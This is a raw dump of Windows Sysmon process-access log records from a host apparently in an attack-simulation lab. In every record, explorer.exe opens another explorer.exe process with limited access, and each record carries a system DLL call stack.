16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 